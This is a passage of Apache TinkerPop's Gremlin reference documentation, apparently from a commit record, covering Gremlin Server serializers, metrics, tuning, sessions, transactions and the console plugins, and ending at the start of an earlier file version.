org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0 }\n\nWhen the standard JSON data types are not enough (e.g. need to identify the difference between `double` and `float`\ndata types), the above configuration will embed types into the JSON itself. The type embedding uses standard Java\ntype names, so interpretation from non-JVM languages will be required. It has the MIME type of\n`application\/vnd.gremlin-v1.0+json` and the following configuration options:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plugin any custom serializers that are tied to it. |_none_\n|=========================================================\n\nGryo\n++++\n\nThe Gryo serializer utilizes Kryo-based serialization which produces a binary output. This format is best consumed\nby JVM-based languages.\n\n[source,yaml]\n - { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerGremlinV1d0 }\n\nIt has the MIME type of `application\/vnd.gremlin-v1.0+gryo` and the following configuration options:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|bufferSize |The maximum size of the Kryo buffer for use on a single object being serialized. Increasing this value will correct `KryoException` errors that complain of \"Buffer too small\". |_4096_\n|classResolverSupplier |The fully qualified classname of a custom `Supplier<ClassResolver>` which will be used when constructing `Kryo` instances. There is no direct default for this setting, but without a setting the `GryoClassResolver` is used. |_none_\n|custom |A list of classes with custom kryo `Serializer` implementations related to them in the form of `<class>;<serializer-class>`. |_none_\n|ioRegistries |A list of `IoRegistry` implementations to be applied to the serializer. |_none_\n|serializeResultToString |When set to `true`, results are serialized by first calling `toString()` on each object in the result list resulting in an extended MIME Type of `application\/vnd.gremlin-v1.0+gryo-stringd`. When set to `false` Kryo-based serialization is applied. |_false_\n|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plugin any custom serializers that are tied to it. |_none_\n|=========================================================\n\nAs described above, there are multiple ways in which to register serializers for Kryo-based serialization. These\nconfigurations can be used in conjunction with one another where there is a specific ordering to how the configurations\nare applied. The `userMapperFromGraph` setting is applied first, followed by any `ioRegistries` and finalized by the\n`custom` setting.\n\nThose configuring or implementing a `Supplier<ClassResolver>` should consider this an \"advanced\" option and typically\nimportant to use cases where server types need to be coerced to client types (i.e. a type is available on the server\nbut not on the client). Implementations should typically instantiate `ClassResolver` implementations that are\nextensions of the `GryoClassResolver` as this class is important to most serialization tasks in TinkerPop.\n\nMetrics\n^^^^^^^\n\nGremlin Server produces metrics about its operations that can yield some insight into how it is performing. These\nmetrics are exposed in a variety of ways:\n\n* Directly to the console where Gremlin Server is running\n* CSV file\n* link:http:\/\/ganglia.info\/[Ganglia]\n* link:http:\/\/graphite.wikidot.com\/[Graphite]\n* link:http:\/\/www.slf4j.org\/[SLF4j]\n* link:https:\/\/en.wikipedia.org\/wiki\/Java_Management_Extensions[JMX]\n\nThe configuration of each of these outputs is described in the Gremlin Server <<_configuring_2, Configuring>> section.\nRegardless of the output, the metrics gathered are the same. Each metric is prefixed with\n`org.apache.tinkerpop.gremlin.server.GremlinServer` and the following metrics are reported:\n\n* `sessions` - the number of sessions open at the time the metric was last measured.\n* `errors` - the number of total errors, mean rate, as well as the 1, 5, and 15-minute error rates.\n* `op.eval` - the number of script evaluations, mean rate, 1, 5, and 15 minute rates, minimum, maximum, median, mean,\nand standard deviation evaluation times, as well as the 75th, 95th, 98th, 99th and 99.9th percentile evaluation times\n(note that these time apply to both sessionless and in-session requests).\n\nBest Practices\n~~~~~~~~~~~~~~\n\nThe following sections define best practices for working with Gremlin Server.\n\nTuning\n^^^^^^\n\nimage:gremlin-handdrawn.png[width=120,float=right] Tuning Gremlin Server for a particular environment may require some simple trial-and-error, but the following represent some basic guidelines that might be useful:\n\n* Gremlin Server defaults to a very modest maximum heap size. Consider increasing this value for non-trivial uses. Maximum heap size (`-Xmx`) is defined with the `JAVA_OPTIONS` setting in `gremlin-server.sh`.\n* When configuring the size of `threadPoolWorker` start with the default of `1` and increment by one as needed to a maximum of `2*number of cores`.\n* The \"right\" size of the `gremlinPool` setting is somewhat dependent on the type of scripts that will be processed\nby Gremlin Server. As requests arrive to Gremlin Server they are decoded and queued to be processed by threads in\nthis pool. When this pool is exhausted of threads, Gremlin Server will continue to accept incoming requests, but\nthe queue will continue to grow. If left to grow too large, the server will begin to slow. When tuning around\nthis setting, consider whether the bulk of the scripts being processed will be \"fast\" or \"slow\", where \"fast\"\ngenerally means being measured in the low hundreds of milliseconds and \"slow\" means anything longer than that.\n** If the bulk of the scripts being processed are expected to be \"fast\", then a good starting point for this setting is `2*threadPoolWorker`.\n** If the bulk of the scripts being processed are expected to be \"slow\", then a good starting point for this setting is `4*threadPoolWorker`.\n* Scripts that are \"slow\" can really hurt Gremlin Server if they are not properly accounted for. `ScriptEngine`\nevaluations are blocking operations that aren't easily interrupted, so once a \"slow\" script is being evaluated in\nthe context of a `ScriptEngine` it must finish its work. Lots of \"slow\" scripts will eventually consume the\n`gremlinPool` preventing other scripts from getting processed from the queue.\n** To limit the impact of this problem consider properly setting the `scriptEvaluationTimeout` and the `serializedResponseTimeout` to something \"sane\".\n** Test the traversals being sent to Gremlin Server and determine the maximum time they take to evaluate and iterate\nover results, then set these configurations accordingly.\n** Note that `scriptEvaluationTimeout` does not interrupt the evaluation on timeout. It merely allows Gremlin Server\nto \"ignore\" the result of that evaluation, which means the thread in the `gremlinPool` will still be consumed after\nthe timeout.\n** The `serializedResponseTimeout` will kill the result iteration process and prevent additional processing. In most\nsituations, the iteration and serialization process is the more costly step in this process as an errant script that\nreturns a million or more results could send Gremlin Server into a long streaming cycle. Script evaluation on the\nother hand is usually very fast, occurring on the order of milliseconds, but that is entirely dependent on the\ncontents of the script itself.\n\n[[parameterized-scripts]]\nParameterized Scripts\n^^^^^^^^^^^^^^^^^^^^^\n\nimage:gremlin-parameterized.png[width=150,float=left] Use script parameterization. Period. Gremlin Server caches\nall scripts that are passed to it. The cache is keyed based on the a hash of the script. Therefore `g.V(1)` and\n`g.V(2)` will be recognized as two separate scripts in the cache. If that script is parameterized to `g.V(x)`\nwhere `x` is passed as a parameter from the client, there will be no additional compilation cost for future requests\non that script. Compilation of a script should be considered \"expensive\" and avoided when possible.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\n\nMap<String,Object> params = new HashMap<>();\nparams.put(\"x\",4);\nclient.submit(\"[1,2,3,x]\", params);\n----\n\nCache Management\n^^^^^^^^^^^^^^^^\n\nIf Gremlin Server processes a large number of unique scripts, the global function cache will grow beyond the memory\navailable to Gremlin Server and an `OutOfMemoryError` will loom. Script parameterization goes a long way to solving\nthis problem and running out of memory should not be an issue for those cases. If it is a problem or if there is no\nscript parameterization due to a given use case (perhaps using with use of <<sessions,sessions>>), it is possible to\nbetter control the nature of the global function cache from the client side, by issuing scripts with a parameter to\nhelp define how the garbage collector should treat the references.\n\nThe parameter is called `#jsr223.groovy.engine.keep.globals` and has four options:\n\n* `hard` - available in the cache for the life of the JVM (default when not specified).\n* `soft` - retained until memory is \"low\" and should be reclaimed before an `OutOfMemoryError` is thrown.\n* `weak` - garbage collected even when memory is abundant.\n* `phantom` - removed immediately after being evaluated by the `ScriptEngine`.\n\nBy specifying an option other than `hard`, an `OutOfMemoryError` in Gremlin Server should be avoided. Of course,\nthis approach will come with the downside that functions could be garbage collected and thus removed from the\ncache, forcing Gremlin Server to recompile later if that script is later encountered.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\n\nMap<String,Object> params = new HashMap<>();\nparams.put(\"x\",4);\nparams.put(\"#jsr223.groovy.engine.keep.globals\", \"soft\");\nclient.submit(\"[1,2,3,x]\", params);\n----\n\n[[sessions]]\nConsidering Sessions\n^^^^^^^^^^^^^^^^^^^^\n\nThe preferred approach for issuing requests to Gremlin Server is to do so in a sessionless manner. The concept of\n\"sessionless\" refers to a request that is completely encapsulated within a single transaction, such that the script\nin the request starts with a new transaction and ends with a closed transaction. Sessionless requests have automatic\ntransaction management handled by Gremlin Server, thus automatically opening and closing transactions as previously\ndescribed. The downside to the sessionless approach is that the entire script to be executed must be known at the\ntime of submission so that it can all be executed at once. This requirement makes it difficult for some use cases\nwhere more control over the transaction is desired.\n\nFor such use cases, Gremlin Server supports sessions. With sessions, the user is in complete control of the start\nand end of the transaction. This feature comes with some additional expense to consider:\n\n* Initialization scripts will be executed for each session created so any expense related to them will be established\neach time a session is constructed.\n* There will be one script cache per session, which obviously increases memory requirements. The cache is not shared,\nso as to ensure that a session has isolation from other session environments. As a result, if the same script is\nexecuted in each session the same compilation cost will be paid for each session it is executed in.\n* Each session will require its own thread pool with a single thread in it - this ensures that transactional\nboundaries are managed properly from one request to the next.\n* If there are multiple Gremlin Server instances, communication from the client to the server must be bound to the\nserver that the session was initialized in. Gremlin Server does not share session state as the transactional context\nof a `Graph` is bound to the thread it was initialized in.\n\nTo connect to a session with Java via the `gremlin-driver`, it is necessary to create a `SessionedClient` from the\n`Cluster` object:\n\n[source,java]\n----\nCluster cluster = Cluster.open(); <1>\nClient client = cluster.connect(\"sessionName\"); <2>\n----\n\n<1> Opens a reference to `localhost` as <<connecting-via-java,previously shown>>.\n<2> Creates a `SessionedClient` given the configuration options of the Cluster. The `connect()` method is given a\n`String` value that becomes the unique name of the session. It is often best to simply use a `UUID` to represent\nthe session.\n\nIt is also possible to have Gremlin Server manage the transactions as is done with sessionless requests. The user is\nin control of enabling this feature when creating the `SessionedClient`:\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect(\"sessionName\", true);\n----\n\nSpecifying `true` to the `connect()` method signifies that the `client` should make each request as one encapsulated\nin a transaction. With this configuration of `client` there is no need to close a transaction manually.\n\nWhen using this mode of the `SessionedClient` it is important to recognize that global variable state for the session\nis not rolled-back on failure depending on where the failure occurs. For example, sending the following script would\ncreate a variable \"x\" in global session scope that would be acccessible on the next request:\n\n[source,groovy]\nx = 1\n\nHowever, sending this script which explicitly throws an exception:\n\n[source,groovy]\ny = 2\nthrow new RuntimeException()\n\nwill result in an obvious failure during script evaluation and \"y\" will not be available to the next request. The\ncomplication arises where the script evaluates successfully, but fails during result iteration or serialization. For\nexample, this script:\n\n[source,groovy]\na = 1\ng.addV()\n\nwould sucessfully evaluate and return a `Traversal`. The variable \"a\" would be available on the next request. However,\nif there was a failure in transaction management on the call to `commit()`, \"a\" would still be available to the next\nrequest.\n\nA session is a \"heavier\" approach to the simple \"request\/response\" approach of sessionless requests, but is sometimes\nnecessary for a given use case.\n\n[[considering-transactions]]\nConsidering Transactions\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nGremlin Server performs automated transaction handling for \"sessionless\" requests (i.e. no state between requests) and\nfor \"in-session\" requests with that feature enabled. It will automatically commit or rollback transactions depending\non the success or failure of the request.\n\nAnother aspect of Transaction Management that should be considered is the usage of the `strictTransactionManagement`\nsetting. It is `false` by default, but when set to `true`, it forces the user to pass `aliases` for all requests.\nThe aliases are then used to determine which graphs will have their transactions closed for that request. Running\nGremlin Server in this configuration should be more efficient when there are multiple graphs being hosted as\nGremlin Server will only close transactions on the graphs specified by the `aliases`. Keeping this setting `false`,\nwill simply have Gremlin Server close transactions on all graphs for every request.\n\n[[considering-state]]\nConsidering State\n^^^^^^^^^^^^^^^^^\n\nWith REST and any sessionless requests, there is no variable state maintained between requests. Therefore,\nwhen <<connecting-via-console,connecting with the console>>, for example, it is not possible to create a variable in\none command and then expect to access it in the next:\n\n[source,groovy]\n----\ngremlin> :remote connect tinkerpop.server conf\/remote.yaml\n==>Configured localhost\/127.0.0.1:8182\ngremlin> :> x = 2\n==>2\ngremlin> :> 2 + x\nNo such property: x for class: Script4\nDisplay stack trace? [yN] n\n----\n\nThe same behavior would be seen with REST or when using sessionless requests through one of the Gremlin Server drivers.\nIf having this behavior is desireable, then <<sessions,consider sessions>>.\n\nThere is an exception to this notion of state not existing between requests and that is globally defined functions.\nAll functions created via scripts are global to the server.\n\n[source,groovy]\n----\ngremlin> :> def subtractIt(int x, int y) { x - y }\n==>null\ngremlin> :> subtractIt(8,7)\n==>1\n----\n\nIf this behavior is not desirable there are several options. A first option would be to consider using sessions. Each\nsession gets its own `ScriptEngine`, which maintains its own isolated cache of global functions, whereas sessionless\nrequests uses a single function cache. A second option would be to define functions as closures:\n\n[source,groovy]\n----\ngremlin> :> multiplyIt = { int x, int y -> x * y }\n==>Script7$_run_closure1@6b24f3ab\ngremlin> :> multiplyIt(7, 8)\nNo signature of method: org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.multiplyIt() is applicable for argument types: (java.lang.Integer, java.lang.Integer) values: [7, 8]\nDisplay stack trace? [yN]\n----\n\nWhen the function is declared this way, the function is viewed by the `ScriptEngine` as a variable rather than a global\nfunction and since sessionless requests don't maintain state, the function is forgotten for the next request. A final\noption would be to manage the `ScriptEngine` cache manually:\n\n[source,bourne]\n----\n$ curl -X POST -d \"{\\\"gremlin\\\":\\\"def divideIt(int x, int y){ x \/ y }\\\",\\\"bindings\\\":{\\\"#jsr223.groovy.engine.keep.globals\\\":\\\"phantom\\\"}}\" \"http:\/\/localhost:8182\"\n{\"requestId\":\"97fe1467-a943-45ea-8fd6-9e889a6c9381\",\"status\":{\"message\":\"\",\"code\":200,\"attributes\":{}},\"result\":{\"data\":[null],\"meta\":{}}}\n$ curl -X POST -d \"{\\\"gremlin\\\":\\\"divideIt(8, 2)\\\"}\" \"http:\/\/localhost:8182\"\n{\"message\":\"Error encountered evaluating script: divideIt(8, 2)\"}\n----\n\nIn the above REST-based requests, the bindings contain a special parameter that tells the `ScriptEngine` cache to\nimmediately forget the script after execution. In this way, the function does not end up being globally available.\n\n[[gremlin-plugins]]\nGremlin Plugins\n---------------\n\nimage:gremlin-plugin.png[width=125]\n\nPlugins provide a way to expand the features of Gremlin Console and Gremlin Server. The following sections describe\nthe plugins that are available directly from TinkerPop. Please see the\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/dev\/provider\/#gremlin-plugins[Provider Documentation] for information on\nhow to develop custom plugins.\n\n[[credentials-plugin]]\nCredentials Plugin\n~~~~~~~~~~~~~~~~~~\n\nimage:gremlin-server.png[width=200,float=left] xref:gremlin-server[Gremlin Server] supports an authentication model\nwhere user credentials are stored inside of a `Graph` instance. This database can be managed with the\nxref:credentials-dsl[Credentials DSL], which can be installed in the console via the Credentials Plugin. This plugin\nis packaged with the console, but is not enabled by default.\n\n[source,groovy]\ngremlin> :plugin use tinkerpop.credentials\n==>tinkerpop.credentials activated\n\nThis plugin imports the appropriate classes for managing the credentials graph.\n\n[[gephi-plugin]]\nGephi Plugin\n~~~~~~~~~~~~\n\nimage:gephi-logo.png[width=200, float=left] link:http:\/\/gephi.github.io\/[Gephi] is an interactive visualization,\nexploration, and analysis platform for graphs. The link:https:\/\/marketplace.gephi.org\/plugin\/graph-streaming\/[Graph Streaming]\nplugin for Gephi provides an link:https:\/\/wiki.gephi.org\/index.php\/Graph_Streaming[API] that can be leveraged to\nstream graphs and visualize traversals interactively through the Gremlin Gephi Plugin.\n\nThe following instructions assume that Gephi has been download and installed. It further assumes that the Graph\nStreaming plugin has been installed (`Tools > Plugins`). The following instructions explain how to visualize a `Graph`\nand `Traversal`.\n\nIn Gephi, create a new project with `File > New Project`. In the lower left view, click the \"Streaming\" tab, open the\nMaster drop down, and right click `Master Server > Start` which starts the Graph Streaming server in Gephi and by\ndefault accepts requests at `http:\/\/localhost:8080\/workspace0`:\n\nimage::gephi-start-server.png[width=800]\n\nIMPORTANT: The Gephi Streaming Plugin doesn't detect port conflicts and will appear to start the plugin successfully\neven if there is something already active on that port it wants to connect to (which is 8080 by default). Be sure\nthat there is nothing running on the port before Gephi will be using before starting the plugin. Failing to do\nthis produce behavior where the console will appear to submit requests to Gephi successfully but nothing will\nrender.\n\nStart the xref:gremlin-console[Gremlin Console] and activate the Gephi plugin:\n\n[gremlin-groovy]\n----\n:plugin use tinkerpop.gephi\ngraph = TinkerFactory.createModern()\n:remote connect tinkerpop.gephi\n:> graph\n----\n\nThe above Gremlin session activates the Gephi plugin, creates the \"modern\" `TinkerGraph`, uses the `:remote` command\nto setup a connection to the Graph Streaming server in Gephi (with default parameters that will be explained below),\nand then uses `:submit` which sends the vertices and edges of the graph to the Gephi Streaming Server. The resulting\ngraph appears in Gephi as displayed in the left image below.\n\nimage::gephi-graph-submit.png[width=800]\n\nNOTE: Issuing `:> graph` again will clear the Gephi workspace and then re-write the graph. To manually empty the\nworkspace do `:> clear`.\n\nNow that the graph is visualized in Gephi, it is possible to link:https:\/\/gephi.github.io\/users\/tutorial-layouts\/[apply a layout algorithm],\nchange the size and\/or color of vertices and edges, and display labels\/properties of interest. Further information\ncan be found in Gephi's tutorial on link:https:\/\/gephi.github.io\/users\/tutorial-visualization\/[Visualization].\nAfter applying the Fruchterman Reingold layout, increasing the node size, decreasing the edge scale, and displaying\nthe id, name, and weight attributes the graph looks as displayed in the right image above.\n\nVisualization of a `Traversal` has a different approach as the visualization occurs as the `Traversal` is executing,\nthus showing a real-time view of its execution. A `Traversal` must be \"configured\" to operate in this format and for\nthat it requires use of the `visualTraversal` option on the `config` function of the `:remote` command:\n\n[gremlin-groovy,modern]\n----\n:remote config visualTraversal graph <1>\ntraversal = vg.V(2).in().out('knows').\n has('age',gt(30)).outE('created').\n has('weight',gt(0.5d)).inV();null\n:> traversal <2>\n----\n\n<1> Configure a \"visual traversal\" from your \"graph\" - this must be a `Graph` instance.\n<2> Submit the `Traversal` to visualize to Gephi.\n\nWhen the `:>` line is called, each step of the `Traversal` that produces or filters vertices generates events to\nGephi. The events update the color and size of the vertices at that step with `startRGBColor` and `startSize`\nrespectively. After the first step visualization, it sleeps for the configured `stepDelay` in milliseconds. On the\nsecond step, it decays the configured `colorToFade` of all the previously visited vertices in prior steps, by\nmultiplying the current `colorToFade` value for each vertex with the `colorFadeRate`. Setting the `colorFadeRate`\nvalue to `1.0` will prevent the color decay. The screenshots below show how the visualization evolves over the four\nsteps:\n\nimage::gephi-traversal.png[width=1200]\n\nTo get a sense of how the visualization configuration parameters affect the output, see the example below:\n\n[gremlin-groovy,modern]\n----\n:remote config startRGBColor [0.0,0.3,1.0]\n:remote config colorToFade b\n:remote config colorFadeRate 0.5\n:> traversal\n----\n\nimage::gephi-traversal-config.png[width=400]\n\nThe visualization configuration above starts with a blue color now (most recently visited), fading the blue color\n(so that dark green remains on oldest visited), and fading the blue color more quickly so that the gradient from dark\ngreen to blue across steps has higher contrast. The following table provides a more detailed description of the\nGephi plugin configuration parameters as accepted via the `:remote config` command:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Parameter |Description |Default\n|workspace |The name of the workspace that your Graph Streaming server is started for. |workspace0\n|host |The host URL where the Graph Streaming server is configured for. |localhost\n|port |The port number of the URL that the Graph Streaming server is listening on. |8080\n|sizeDecrementRate |The rate at which the size of an element decreases on each step of the visualization. |0.33\n|stepDelay |The amount of time in milliseconds to pause between step visualizations. |1000\n|startRGBColor |A size 3 float array of RGB color values which define the starting color to update most recently visited nodes with. |[0.0,1.0,0.5]\n|startSize |The size an element should be when it is most recently visited. |20\n|colorToFade |A single char from the set `{r,g,b,R,G,B}` determining which color to fade for vertices visited in prior steps |g\n|colorFadeRate |A float value in the range `(0.0,1.0]` which is multiplied against the current `colorToFade` value for prior vertices; a `1.0` value effectively turns off the color fading of prior step visited vertices |0.7\n|visualTraversal |Creates a `TraversalSource` variable in the Console named `vg` which can be used for visualizing traversals. This configuration option takes two parameters. The first is required and is the name of the `Graph` instance variable that will generate the `TraversalSource`. The second parameter is the variable name that the `TraversalSource` should have when referenced in the Console. If left unspecified, this value defaults to `vg`.\n|=========================================================\n\n[[server-plugin]]\nServer Plugin\n~~~~~~~~~~~~~\n\nimage:gremlin-server.png[width=200,float=left] xref:gremlin-server[Gremlin Server] remotely executes Gremlin scripts\nthat are submitted to it. The Server Plugin provides a way to submit scripts to Gremlin Server for remote\nprocessing. Read more about the plugin and how it works in the Gremlin Server section on xref:connecting-via-console[Connecting via Console].\n\nNOTE: The Server Plugin is enabled in the Gremlin Console by default.\n\n[[sugar-plugin]]\nSugar Plugin\n~~~~~~~~~~~~\n\nimage:gremlin-sugar.png[width=120,float=left] In previous versions of Gremlin-Groovy, there were numerous\nlink:http:\/\/en.wikipedia.org\/wiki\/Syntactic_sugar[syntactic sugars] that users could rely on to make their traversals\nmore succinct. Unfortunately, many of these conventions made use of link:http:\/\/docs.oracle.com\/javase\/tutorial\/reflect\/[Java reflection]\nand thus, were not performant. In TinkerPop3, these conveniences have been removed in support of the standard\nGremlin-Groovy syntax being both inline with Gremlin-Java8 syntax as well as always being the most performant\nrepresentation. However, for those users that would like to use the previous syntactic sugars (as well as new ones),\nthere is `SugarGremlinPlugin` (a.k.a Gremlin-Groovy-Sugar).\n\nIMPORTANT: It is important that the sugar plugin is loaded in a Gremlin Console session prior to any manipulations of\nthe respective TinkerPop3 objects as Groovy will cache unavailable methods and properties.\n\n[source,groovy]\n----\ngremlin> :plugin use tinkerpop.sugar\n==>tinkerpop.sugar activated\n----\n\nTIP: When using Sugar in a Groovy class file, add `static { SugarLoader.load() }` to the head of the file. Note that\n`SugarLoader.load()` will automatically call `GremlinLoader.load()`.\n\nGraph Traversal Methods\n^^^^^^^^^^^^^^^^^^^^^^^\n\nIf a `GraphTraversal` property is unknown and there is a corresponding method with said name off of `GraphTraversal`\nthen the property is assumed to be a method call. This enables the user to omit `( )` from the method name. However,\nif the property does not reference a `GraphTraversal` method, then it is assumed to be a call to `values(property)`.\n\n[gremlin-groovy,modern]\n----\ng.V <1>\ng.V.name <2>\ng.V.outE.weight <3>\n----\n\n<1> There is no need for the parentheses in `g.V()`.\n<2> The traversal is interpreted as `g.V().values('name')`.\n<3> A chain of zero-argument step calls with a property value call.\n\nRange Queries\n^^^^^^^^^^^^^\n\nThe `[x]` and `[x..y]` range operators in Groovy translate to `RangeStep` calls.\n\n[gremlin-groovy,modern]\n----\ng.V[0..2]\ng.V[0..<2]\ng.V[2]\n----\n\nLogical Operators\n^^^^^^^^^^^^^^^^^\n\nThe `&` and `|` operator are overloaded in `SugarGremlinPlugin`. When used, they introduce the `AndStep` and `OrStep`\nmarkers into the traversal. See <<and-step,`and()`>> and <<or-step,`or()`>> for more information.\n\n[gremlin-groovy,modern]\n----\ng.V.where(outE('knows') & outE('created')).name <1>\nt = g.V.where(outE('knows') | inE('created')).name; null <2>\nt.toString()\nt\nt.toString()\n----\n\n<1> Introducing the `AndStep` with the `&` operator.\n<2> Introducing the `OrStep` with the `|` operator.\n\nTraverser Methods\n^^^^^^^^^^^^^^^^^\n\nIt is rare that a user will ever interact with a `Traverser` directly. However, if they do, some method redirects exist\nto make it easy.\n\n[gremlin-groovy,modern]\n----\ng.V().map{it.get().value('name')} \/\/ conventional\ng.V.map{it.name} \/\/ sugar\n----\n\n[[utilities-plugin]]\nUtilities Plugin\n~~~~~~~~~~~~~~~~\n\nThe Utilities Plugin provides various functions, helper methods and imports of external classes that are useful in the console. \n\nNOTE: The Utilities Plugin is enabled in the Gremlin Console by default.\n\n[[benchmarking-and-profiling]]\nBenchmarking and Profiling\n^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe link:https:\/\/code.google.com\/p\/gperfutils\/[GPerfUtils] library provides a number of performance utilities for\nGroovy. Specifically, these tools cover benchmarking and profiling.\n\nBenchmarking allows execution time comparisons of different pieces of code. While such a feature is generally useful,\nin the context of Gremlin, benchmarking can help compare traversal performance times to determine the optimal\napproach. Profiling helps determine the parts of a program which are taking the most execution time, yielding\nlow-level insight into the code being examined.\n\n[gremlin-groovy,modern]\n----\n:plugin use tinkerpop.sugar \/\/ Activate sugar plugin for use in benchmark\nbenchmark{\n 'sugar' {g.V(1).name.next()}\n 'nosugar' {g.V(1).values('name').next()}\n}.prettyPrint()\nprofile { g.V().iterate() }.prettyPrint()\n----\n\n[[describe-graph]]\nDescribe Graph\n^^^^^^^^^^^^^^\n\nA good implementation of the Gremlin APIs will validate their features against the xref:validating-with-gremlin-test[Gremlin test suite].\nTo learn more about a specific implementation's compliance with the test suite, use the `describeGraph` function.\nThe following shows the output for `HadoopGraph`:\n\n[gremlin-groovy,modern]\n----\ndescribeGraph(HadoopGraph)\n----\n\n[[gremlin-archetypes]]\nGremlin Archetypes\n------------------\n\nTinkerPop has a number of link:https:\/\/maven.apache.org\/guides\/introduction\/introduction-to-archetypes.html[Maven archetypes],\nwhich provide example project templates to quickly get started with TinkerPop. The available archetypes are as follows:\n\n* `gremlin-archetype-server` - An example project that demonstrates the basic structure of a\n<<gremlin-server,Gremlin Server>> project, how to connect with the Gremlin Driver, and how to embed Gremlin Server in\na testing framework.\n* `gremlin-archetype-tinkergraph` - A basic example of how to structure a TinkerPop project with Maven.\n\nYou can use Maven to generate these example projects with a command like:\n\n[source,shell]\n$ mvn archetype:generate -DarchetypeGroupId=org.apache.tinkerpop -DarchetypeArtifactId=gremlin-archetype-server\n -DarchetypeVersion=x.y.z -DgroupId=com.my -DartifactId=app -Dversion=0.1 -DinteractiveMode=false\n\nThis command will generate a new Maven project in a directory called \"app\" with a `pom.xml` specifying a `groupId` of\n`com.my`. Please see the `README.asciidoc` in the root of each generated project for information on how to build and\nexecute it.\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[gremlin-applications]]\nGremlin Applications\n====================\n\nGremlin applications represent tools that are built on top of the core APIs to help expose common functionality to\nusers when working with graphs. There are two key applications:\n\n. Gremlin Console - A link:http:\/\/en.wikipedia.org\/wiki\/Read%E2%80%93eval%E2%80%93print_loop[REPL] environment for\ninteractive development and analysis\n. Gremlin Server - A server that hosts script engines thus enabling remote Gremlin execution\n\nimage:gremlin-lab-coat.png[width=310,float=left] Gremlin is designed to be extensible, making it possible for users\nand graph system\/language providers to customize it to their needs. Such extensibility is also found in the Gremlin\nConsole and Server, where a universal plugin system makes it possible to extend their capabilities. One of the\nimportant aspects of the plugin system is the ability to help the user install the plugins through the command line\nthus automating the process of gathering dependencies and other error prone activities.\n\nThe process of plugin installation is handled by link:http:\/\/groovy.codehaus.org\/Grape[Grape], which helps resolve\ndependencies into the classpath. It is therefore important to ensure that Grape is properly configured in order to\nuse the automated capabilities of plugin installation. Grape is configured by `~\/.groovy\/grapeConfig.xml` and\ngenerally speaking, if that file is not present, the default settings will suffice. However, they will not suffice\nif a required dependency is not in one of the default configured repositories. Please see the\nlink:http:\/\/groovy.codehaus.org\/Grape[Custom Ivy Settings] section of the Grape documentation for more details on\nthe defaults. TinkerPop recommends the following configuration in that file:\n\n[source,xml]\n<ivysettings>\n <settings defaultResolver=\"downloadGrapes\"\/>\n <resolvers>\n <chain name=\"downloadGrapes\">\n <filesystem name=\"cachedGrapes\">\n <ivy pattern=\"${user.home}\/.groovy\/grapes\/[organisation]\/[module]\/ivy-[revision].xml\"\/>\n <artifact pattern=\"${user.home}\/.groovy\/grapes\/[organisation]\/[module]\/[type]s\/[artifact]-[revision].[ext]\"\/>\n <\/filesystem>\n <ibiblio name=\"codehaus\" root=\"http:\/\/repository.codehaus.org\/\" m2compatible=\"true\"\/>\n <ibiblio name=\"central\" root=\"http:\/\/central.maven.org\/maven2\/\" m2compatible=\"true\"\/>\n <ibiblio name=\"jitpack\" root=\"https:\/\/jitpack.io\" m2compatible=\"true\"\/>\n <ibiblio name=\"java.net2\" root=\"http:\/\/download.java.net\/maven\/2\/\" m2compatible=\"true\"\/>\n <\/chain>\n <\/resolvers>\n<\/ivysettings>\n\nThe Graph configuration can also be modified to include the local system's Maven `.m2` directory by one or both\nof the following entries:\n\n[source,xml]\n<ibiblio name=\"apache-snapshots\" root=\"http:\/\/repository.apache.org\/snapshots\/\" m2compatible=\"true\"\/>\n<ibiblio name=\"local\" root=\"file:${user.home}\/.m2\/repository\/\" m2compatible=\"true\"\/>\n\nThese configurations are useful during development (i.e. if one is working with locally built artifacts) of TinkerPop\nPlugins. It is important to take note of the order used for these references as Grape will check them in the order\nthey are specified and depending on that order, an artifact other than the one expected may be used which is typically\nan issue when working with SNAPSHOT dependencies.\n\nWARNING: If building TinkerPop from source, be sure to clear TinkerPop-related jars from the `~\/.groovy\/grapes`\ndirectory as they can become stale on some systems and not re-import properly from the local `.m2` after fresh rebuilds.\n\n[[gremlin-console]]\nGremlin Console\n---------------\n\nimage:gremlin-console.png[width=325,float=right] The Gremlin Console is an interactive terminal or\nlink:http:\/\/en.wikipedia.org\/wiki\/Read%E2%80%93eval%E2%80%93print_loop[REPL] that can be used to traverse graphs\nand interact with the data that they contain. It represents the most common method for performing ad-hoc graph\nanalysis, small to medium sized data loading projects and other exploratory functions. The Gremlin Console is\nhighly extensible, featuring a rich plugin system that allows new tools, commands,\nlink:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSLs], etc. to be exposed to users.\n\nTo start the Gremlin Console, run `gremlin.sh` or `gremlin.bat`:\n\n[source,text]\n----\n$ bin\/gremlin.sh\n\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\nplugin loaded: tinkerpop.server\nplugin loaded: tinkerpop.utilities\nplugin 